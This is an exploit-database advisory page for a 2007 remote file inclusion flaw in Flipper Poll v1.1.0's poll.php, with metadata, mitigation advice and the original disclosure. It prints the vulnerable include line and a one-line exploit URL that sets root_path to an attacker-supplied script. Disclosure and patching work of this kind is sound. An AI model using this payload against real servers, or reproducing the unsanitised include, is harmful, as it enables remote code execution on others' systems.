header-logo
Suggest Exploit
vendor:
Flipper Poll
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Flipper Poll
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Flipper Poll v1.1.0 (poll.php) remote file include vuln

The vulnerability allows an attacker to include a remote file by manipulating the 'root_path' parameter in the 'poll.php' script. This can be exploited to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and properly sanitize the 'root_path' parameter before including any files.
Source

Exploit-DB raw data:

Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
 
Found: Cyber-Security
cyber-security.org
 
---------------------------------------------------------------------------------
 
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
 
---------------------------------------------------------------------------------

Vuln Code: include_once($root_path . 'config.php');
 
---------------------------------------------------------------------------------
 
Exploit: /poll.php?root_path=evilscripts?
 
---------------------------------------------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
 
---------------------------------------------------------------------------------

# milw0rm.com [2007-02-02]